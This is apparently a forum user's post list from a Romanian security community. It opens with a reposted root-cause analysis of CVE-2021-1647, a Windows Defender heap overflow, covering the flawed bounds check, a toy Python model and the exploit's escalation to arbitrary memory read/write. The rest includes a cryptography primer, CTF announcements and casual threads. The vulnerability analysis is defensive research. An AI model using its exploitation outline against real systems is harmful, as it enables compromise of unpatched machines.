Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table while unpacking an ASProtect-packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks whether the next section entry's address is lower than the previous one, not whether they are equal. This means that if you have a section table such as the one used in this exploit sample, [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when the code sees the next entry at 0x2000, it simply skips over it without exiting or updating the size of the section. 0x3000 bytes will then be copied to that section during decompression, leading to the heap buffer overflow.

if ( next_sect_addr > sect_addr ) // current va is greater than prev (not also eq)
{
    sect_addr = next_sect_addr;
    sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000;
}
// if next_sect_addr <= sect_addr we continue on to next entry in the table
[...]
new_sect_alloc = operator new[](sect_sz + sect_addr); // allocate new section
[...]
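A toy Python model of the flawed walk (the function and variable names here are invented for illustration; this is not Defender's actual code):

```python
def compute_alloc(sections, patched=False):
    """Walk (virtual_address, size) section entries the way the quoted
    decompiled logic does: only a strictly increasing address updates the
    tracked allocation size."""
    sect_addr, sect_sz = 0, 0
    for va, size in sections:
        if va > sect_addr:                           # vulnerable check: '>' but not '>='
            sect_addr = va
            sect_sz = (size + 0xFFF) & 0xFFFFF000    # round size up to a 0x1000 page
        elif patched:
            # The fix: error out on a non-increasing address instead of skipping it.
            raise ValueError("non-increasing section address")
        # vulnerable behavior: silently skip the duplicate entry
    return sect_addr + sect_sz                       # bytes allocated for the image

# Section table from the exploit sample: the duplicate 0x2000 entry is skipped,
# so its 0x3000-byte size never contributes to the allocation.
table = [(0, 0), (0, 0), (0x2000, 0), (0x2000, 0x3000)]
print(hex(compute_alloc(table)))   # 0x2000 allocated, yet 0x3000 bytes get copied there
```

With `patched=True`, the same table raises an error instead of silently under-allocating, mirroring the else branch added in 1.1.17700.4.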
Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison, so that if any entry in the section array has an address less than or equal to the previous entry, the code errors out and exits rather than continuing to decompress.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review.

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):
1. The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object, which is allocated in the lfind_switch::switch_out function.
2. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur.
3. The out-of-bounds write in step 2 performs an OR operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table tracking the virtually mapped pages. This field usually equals the number of pages mapped * 2. By performing the OR operation, the value in that field is increased (for example, from 0x0000000C to 0x0003030C).
4. When it is increased, it allows for an additional out-of-bounds read & write, used for modifying the memory-management struct to allow for arbitrary read/write.
Exploit flow: The exploit uses "primitive bootstrapping": the original buffer overflow is used to cause two additional out-of-bounds writes and ultimately gain arbitrary read/write.

Known cases of the same exploit flow: Unknown.

Part of an exploit chain? Unknown.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):
Review the ASProtect unpacker for additional parsing bugs.
Review and/or fuzz other unpacking code for parsing and memory issues.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class: Building mpengine.dll with ASAN enabled should allow this bug class to be caught. Open-sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily.

Ideas to mitigate the exploit flow: Adding bounds checking anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write, which allowed this exploit to modify the VMM_context_t structure.

Other potential improvements: It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, there was an article announcing that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default would make this vulnerability more difficult to exploit, because a sandbox escape would then be required in addition to this vulnerability.

0-day detection methods

What are potential detection methods for similar 0-days?
Meaning: are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Detecting these types of 0-days will be difficult, because the sample simply drops a new file with the characteristics needed to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out.

Other References

February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧 ("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook

Source: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html
  6. Don't forget: this weekend, CTF, prizes! https://ctf.rstforums.com/ If anyone can contribute exercises, nothing too difficult, that would be perfect.
  7. I booked my appointment at Romexpo when there were still 3000 people on the waiting list. And I think it took about 2 weeks before I could get an appointment.
  8. I'm not preparing to give any order, you're blatantly lying to people. As for losing the belly, I keep trying but can't manage it... Maybe those who give the order can also give me some tips on getting rid of my belly.
  9. Hi, SHA256/SHA512 etc. cannot be reversed because they are hashing algorithms. For example, the sha256 hash of the text "Gigel" is 38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510. The hash of the much longer text "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" is 299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be. As you can see, regardless of the length of the text, the length of the hash is the same. Whether the text (or binary) is 1 KB or 2 TB, its hash will always have the same length and will always be the same for the same input. That is why hashes are used to avoid storing passwords in plain text in a database. To take a simpler example: the CNP (Romanian personal numeric code). It encodes sex, birth date, county... and the last digit is a "checksum". The exact algorithm is described here: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - that is how the last digit is computed. But let's take an even simpler example: say that for the CNP 1881111111116, the checksum is the final digit "6", computed just by adding up the digits and taking the remainder modulo 10 (i.e. %10). A hash, conceptually, is something similar. A hash is essentially that final "6". Can you deduce the CNP from that 6? Clearly not. The only thing you can do against hashes is brute force, which can be optimized by exploiting some "problems" in the hash algorithms. That is, hashing every combination of text: aaaaaa, aaaaab, aaaaac, etc., until you reach the desired hash. The discussion could go on.
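The fixed-length property described above can be checked with Python's standard hashlib module (a minimal sketch):

```python
import hashlib

short_hash = hashlib.sha256(b"Gigel").hexdigest()
long_hash = hashlib.sha256(b"Gigel " * 100_000).hexdigest()   # ~600 KB of input

# Both digests are 256 bits = 64 hex characters, regardless of input size,
# and the same input always yields the same digest.
print(len(short_hash), len(long_hash))                        # 64 64
print(short_hash == hashlib.sha256(b"Gigel").hexdigest())     # True
```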
  10. CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS

1 What is cryptography?

Cryptography is a collection of techniques for:
- concealing data transmitted over insecure channels
- validating message integrity and authenticity

2 Some cryptographic terms

plaintext – a message or other data in readable form
ciphertext – a message concealed for transmission or storage
encryption – transforming plaintext into ciphertext
decryption – transforming ciphertext back into plaintext
key – an input to an encryption or decryption algorithm that determines the specific transformation applied
hash – the output of an algorithm that produces a fixed N-bit output from any input of any size
entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant.

3 Basic cryptographic algorithms

3.1 symmetric ciphers

A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms:

encryption: ciphertext = E(plaintext, key)
decryption: plaintext = D(ciphertext, key)

Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can't feasibly try all of the keys ("brute-forcing") to see if one of them decrypts a message.

3.2 block ciphers

A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice versa.
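The E/D round trip from section 3.1 can be illustrated with a toy repeating-key XOR cipher (deliberately insecure, illustration only; real systems use vetted ciphers such as AES):

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR is its own inverse, so E and D are the same function here.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"sixteen byte key"                 # the secret both parties must share (use random keys in reality)
plaintext = b"attack at dawn"
ciphertext = xor_cipher(plaintext, key)   # ciphertext = E(plaintext, key)
recovered = xor_cipher(ciphertext, key)   # plaintext  = D(ciphertext, key)
print(recovered)                          # b'attack at dawn'
```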
Example block ciphers:
- DES (the former Data Encryption Standard), with a 64-bit block and 56-bit keys, now obsolete because both the block size and key size are too small and allow for easy brute-forcing
- AES (Advanced Encryption Standard, formerly known as Rijndael), with 128-bit blocks and keys of 128, 192, or 256 bits

3.3 stream ciphers

A stream cipher produces a stream of random bits based on a key that can be combined (usually using XOR) with data for encryption or decryption.

Example stream ciphers:
- ChaCha20
- RC4 (now considered too weak to use)

3.4 public-key (or asymmetric) ciphers

A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms:

ciphertext = E(plaintext, K1) or E(plaintext, K2)
plaintext = D(ciphertext, K2) or D(ciphertext, K1)

Unlike a symmetric cipher, where the key must be kept secret between the parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key.

Example public-key algorithms:
- RSA (from the initials of its creators Rivest, Shamir, and Adleman), based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit primes are considered necessary to create secure RSA keys (factorization of keys based on 512-bit primes has already been demonstrated, and 1024-bit keys appear feasible).
- Elliptic curve algorithms, based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys).

However, public-key algorithms are much (hundreds to thousands of times) slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption.
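The RSA mechanics described above can be sketched with textbook modular arithmetic and comically small primes (illustration only: real RSA uses keys of 2048 bits or more, random padding such as OAEP, and a vetted library; `pow(e, -1, phi)` needs Python 3.8+):

```python
p, q = 61, 53                # two "large primes" (tiny here, for illustration)
n = p * q                    # public modulus: 3233
phi = (p - 1) * (q - 1)      # Euler's totient of n: 3120
e = 17                       # public exponent, coprime with phi
d = pow(e, -1, phi)          # private exponent: e*d = 1 (mod phi)

m = 42                       # a message, encoded as an integer < n
c = pow(m, e, n)             # encrypt with one key:      c = m^e mod n
assert pow(c, d, n) == m     # decrypt with the other:    m = c^d mod n

# The keys are complementary: applying d first and e second also works,
# which is the basis of digital signatures.
assert pow(pow(m, d, n), e, n) == m
```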
However, public-key algorithms do provide a secure way to transmit symmetric cipher keys.

3.5 Diffie-Hellman key exchange

An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be performed using either modular arithmetic with large prime numbers or elliptic-curve fields.

Diffie-Hellman is also usually the basis of "forward secrecy". One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman, which establishes those keys in a way that is inaccessible to an eavesdropper.

3.6 hash algorithms

A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular, for cryptographic use a hash has these properties:
- two different inputs are very unlikely to produce the same hash (a "collision")
- it should be very difficult to find another input that produces any specified hash value (a "preimage")
- even a one-bit change in the input should produce a hash that differs in about N/2 bits

Note that because the possible number of inputs to a hash function is much larger than the number of hash outputs, there is always some small probability of a collision or of finding a preimage. In the ideal case, finding a collision in an N-bit hash requires about 2^(N/2) randomly chosen inputs (look up the "birthday problem" for why it is N/2 and not N), and a random input has a 2^-N probability of producing a specified hash value.
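The "one-bit change flips about N/2 output bits" property is easy to observe with hashlib (a minimal sketch; the exact count varies per input pair, but clusters around 128 for SHA-256):

```python
import hashlib

def bit_diff(a: bytes, b: bytes) -> int:
    # Count the number of differing bits between two equal-length digests.
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

d1 = hashlib.sha256(b"message A").digest()
d2 = hashlib.sha256(b"message B").digest()   # input differs by one character

# For an ideal 256-bit hash, roughly 128 of the 256 output bits differ.
print(bit_diff(d1, d2))
```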
Example hash algorithms:
- MD5 produces a 128-bit hash from its input. It has practical demonstrated collisions and should not be used for cryptographic purposes.
- SHA-1 produces 160-bit hashes but has at least one demonstrated collision and is also deprecated for cryptographic use (however, it is still used in git, where it remains workable as a content-addressing hash function).
- SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 hash truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 truncates a SHA-512 hash to 384 bits.

3.7 cryptographic random number generators

Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers.

At one point the Debian maintainers made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 16 bits of entropy, meaning in particular that ssh-keygen could generate only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating over 2^2000. Once this was discovered and patched, a lot of people had to change their host keys (or risk "man-in-the-middle" impersonation attacks).

Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as timing of disk I/O, network packets, or keyboard input) that is "mixed" into existing random state using a cipher or cryptographic hash.
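In Python, the contrast between a seeded, predictable PRNG and the OS-backed CSPRNG looks like this (a minimal sketch):

```python
import random
import secrets

# A seeded PRNG (Mersenne Twister here) is deterministic: anyone who learns or
# guesses the seed can reproduce the entire "random" stream. Fine for
# simulations, catastrophic for keys (compare the Debian OpenSSL incident above).
predictable_1 = random.Random(1234).getrandbits(128)
predictable_2 = random.Random(1234).getrandbits(128)
print(predictable_1 == predictable_2)   # True: same seed, same stream

# The secrets module draws from the OS CSPRNG and is intended for secrets.
key = secrets.token_bytes(32)           # 256 bits of key material
token = secrets.token_urlsafe(16)       # e.g. an unguessable session identifier
```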
4 Cryptographic Protocols

The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol.

4.1 cipher modes

The simplest thing you can do with a block cipher is break the plaintext up into blocks, then encrypt each block with your chosen key (also called ECB, for "Electronic Code Book", by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if a particular plaintext block is repeated in the input, the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block boundary the same way more than once.

There are other ways to use block ciphers that avoid this. The simplest is CBC, or "Cipher Block Chaining", where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with the result to recover the plaintext. There are other modes, like OFB ("Output FeedBack"), that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won't result in repeated ciphertext blocks. These modes also often depend on an "initialization vector", which is typically some cryptographically random value that makes the initial state of the encryption unpredictable to an outside observer.

4.2 message signing

Someone who has created a public key pair (K1, K2) and published a public key (let's say that's K2) can encrypt a message using their private key K1, and anyone can validate that the message came from that sender by decrypting it with the public key K2. Due to the much higher computational cost of encrypting data with public-key algorithms, the signer usually encrypts only a cryptographic hash of the original message.
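Hash-then-sign can be sketched with textbook-RSA toy numbers (n = 61*53, e = 17, d = 2753 are illustration values only; real signatures use large keys and a padding scheme such as RSASSA-PSS):

```python
import hashlib

# Toy textbook-RSA key pair (illustration only; real keys are 2048+ bits).
n, e, d = 61 * 53, 17, 2753    # public modulus, public exponent, private exponent

message = b"release v1.0"
# Hash the message, then reduce it so it fits the toy modulus.
digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n

signature = pow(digest, d, n)  # the signer "encrypts" the hash with the PRIVATE key

# Anyone holding the public key (n, e) can verify: recompute the hash and
# compare it against the "decrypted" signature.
recomputed = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
assert pow(signature, e, n) == recomputed   # a tampered message would (almost surely) fail here
```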
A sender can also send a plaintext message along with a signature created with their private key if the privacy of the message is not important but validating the identity of the sender is.

Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and a signature of that key generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it.

An SSL/TLS client can validate the identity of a server by encrypting a large random number with the public key in the server certificate. If the server can decrypt the random number with its private key and return it, the client can assume the server is what it says it is.

"Self-signed" certificates are merely public keys signed with the corresponding private key. This isn't as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn't require interaction with a certificate authority. However, ultimately the buck has to stop somewhere, and even certificate authority "root certificates" are self-signed.

Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates), email encryption tools like GPG have a "web of trust" model where someone's public key can be signed by many other individuals or entities, so that if you trust at least some of those others, it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else's and there'd be no easy way to validate it.

4.3 secure email

If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME), you create a public key pair (K1, K2) and publish the public key K2.
Someone who wants to send you mail picks a cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key, encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You can decrypt the cipher key with your private key, and then decrypt their message from the ciphertext with the indicated cipher. Note that for this model to work, everyone who wants to receive encrypted email has to publish a public key.

4.4 SSL/TLS

SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary it does these things:
- client and server agree on a "cipher suite" to use, which consists of:
  - a method for key exchange (via the public/private key pair in a certificate, or Diffie-Hellman key exchange)
  - a method for server validation (based on the public-key algorithm used in its certificate)
  - a symmetric cipher for bulk data encryption
  - a hash algorithm to use for message authentication (actually an HMAC, or "Hashed Message Authentication Code", which hashes a combination of a secret key and the data)
- establish random shared keys for the symmetric cipher and HMAC using the specified key exchange method
- transmit data using the specified symmetric cipher and HMAC algorithms

5 Cryptanalysis

Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks significantly better than brute force.
It's a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed

6 Cryptographic tools

6.1 OpenSSL

Although it's taken a lot of heat for some of its previous security issues (particularly "Heartbleed"), it's still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provides a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command, which can initiate an SSL/TLS client connection and, more importantly, shows a lot of useful debugging data about the protocol negotiation, including the certificate and cipher suite properties.

6.2 gnutls

The GNU Project's SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption.

6.3 gnupg

Primarily intended for encrypting or decrypting secure mail messages, it also provides some functionality for encrypting or decrypting files and creating or validating signatures.

7 General cryptographic advice

7.1 Use established, publicly analyzed algorithms and tools

Schneier's Law: "Anyone can create an algorithm that they can't break." https://www.schneier.com/blog/archives/2011/04/schneiers_law.html

Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard, and even expert cryptographers have created methods that, once exposed to public analysis, turned out to be easy to break.

7.2 Zealously protect keys and credentials

Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file?
What if it's copied into backups that are available to other untrusted users? Think carefully about how you handle and store that kind of sensitive material.

Source: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/
  11. Pff, you removed the layer I added in Photoshop. Microsoft Power!
  12. Hi, there's nothing useful you can do with a botnet; our suggestion is to find something better to do. We're no longer in the 2000s, let's evolve a little too.
  13. Done, I got my first dose of the vaccine. I barely felt the injection. I couldn't take a photo/video because the lady there didn't agree and I didn't insist. Everything was fine until I left, then I thought I wouldn't make it home alive... The Uber driver drove like he was in a rally. I knew the vaccine affects the people around you too! I had no fever or other symptoms afterwards, none at all. Just a small pain at the injection site when pressing on the area.
  14. Most likely you need to capture the packets with (SRC IP: yours and DST PORT 80) + (DST IP: yours and SRC PORT 80), i.e. both the requests and the responses. I think it's enough to filter packets on port 80 (both src and dst). Open the browser and type http://blabla.com - put that http:// in front to force the traffic over HTTP. Then it should show up; just make sure the sniffing is done on the correct interface (eth0 or whatever it is).
  15. Hi, I'm not sure I understood where you're having trouble; it seems to me you're on the right track.
  16. Nytro

    APK modification

    Example: https://portswigger.net/support/configuring-an-android-device-to-work-with-burp
  17. Yes, I have another friend who had similar symptoms. PS: Don't do a "submarine" (a shot dropped into a pint) with beer and gin, it's brutal.
  18. I'm getting vaccinated this week. It'll be Pfizer. I didn't know that when I chose the center, but for some time now the map of centers has also shown which vaccine each vaccination center uses. I'll try to take a photo when I get vaccinated.
  19. Honestly, instead of struggling like this, talk nicely to that lady and convince her that she's paying for the internet anyway and has nothing to lose if you use it.
  20. Hi, a small issue: those who sent me donations, please PM me with the name the transfer was sent under. The thing is I don't know exactly which users sent them; I want to post the list of users who donated, not their real names.

CTF details:
Date: April 17-18
Category: Beginners
Type: Individual
Prizes: 3500+ RON

Registration is open on the platform: https://ctf.rstforums.com/ If anyone can help with exercises, nothing too difficult, I'm waiting for your PM.
  21. I'm scheduled this week. I hope I can take a photo/video. Where did you get that 50% figure from? It sounds like Antena3/Romania TV/Realitatea or even ortodoxinfo. I just visited that garbage site; you need at most two years of schooling to read what's written there. You should pick better sources of information or talk to some doctors. At least call your family doctor and see what they say. I suppose you don't have more educated friends to talk to, or doctors. I know doctors; they and their families got vaccinated and they recommend everyone do the same. But you still bring no arguments. Arguments. You know what I mean? That is, not idiotic ideas with no basis in reality. You have to believe what I say, I'm at the head of the New World Order. If you don't believe it, prove that I'm not.
  22. Hi, it wouldn't be a bad move; demand for people in the field is growing, including in Romania. Interviews include all kinds of questions, both general security questions from any branch of it and, especially, questions about what each company needs. Most companies, I think, work with web applications, and there you need detailed knowledge of web vulnerabilities. I don't know how much a master's degree helps, at least in this country. It's good to have if it doesn't get in your way, if you only go there occasionally and for exams. That's roughly how security is split: jobs on the defensive side, attack analysis, SOC (Security Operations Center) and others where sysadmin knowledge helps, and the offensive side, where the necessary skills are a bit different, but not by much - a bit of programming helps here, quite a lot actually, plus protocols and many other things.
  23. SUSPECTED. If someone gets vaccinated and later dies, of any medical condition whatsoever, the vaccine is also taken into consideration. That does not mean the vaccine is to blame.

"99 social circumstances, incl. 2 deaths
138 surgical and medical procedures, incl. 4 deaths
1,977 eye disorders, incl. 1 death
2,676 metabolism and nutrition disorders, incl. 5 deaths"

Those are a few examples. Still, this vaccine must be a real super-killer if it kills through all these kinds of causes. Then:
- 4000 POSSIBLE deaths (though chances are slim) out of 138 MILLION vaccinations
- Covid-19 deaths: 2.84 MILLION

Covid: Cases 130M (130,000,000), Recovered 73.9M (73,900,000), Deaths 2.84M (2,840,000)

In short, for those who can't read:
- 130 million Covid cases result in 2.84 MILLION deaths. That is 2,840,000.
- 130 million anti-Covid vaccinations result in MAYBE 4000 deaths. That is 4,000.

So let's not get vaccinated, right? So many people lacking elementary logic. You deserve your fate.
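Taking the post's own summary figures at face value (130 million in each group; these are forum-quoted numbers, not verified data), the arithmetic is:

```python
covid_cases = vaccinations = 130_000_000          # the post's summary uses 130M for both
covid_deaths, suspected_vaccine_deaths = 2_840_000, 4_000   # the 4000 are only "suspected"

covid_rate = covid_deaths / covid_cases                     # roughly 2.18% of cases died
vaccine_rate = suspected_vaccine_deaths / vaccinations      # roughly 0.003%
print(f"{covid_rate:.2%} vs {vaccine_rate:.4%}")
print(covid_deaths // suspected_vaccine_deaths)             # 710: deaths differ by ~three orders of magnitude
```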
  24. Hi, you can't decrypt it because it isn't encrypted. It's probably a binary format; those hex bytes mean something. It's difficult to do "reversing" on such a text; you can deduce certain things, but doing it completely is very hard. One solution would be to find out which program generates it; reverse engineering that program should tell you roughly what the file contains.
  25. It's not nonsense, I'll prove it to you, I'll give you a link to register through. And you can all register, it'll rain money on you!!! PS: I'm joking, obviously. Yeah, I have no idea if anything can be done. I don't know whether it breaks any laws, nor what could be done about it, although it is a form of fraud. At the end of the day, Darwin knew what he was talking about.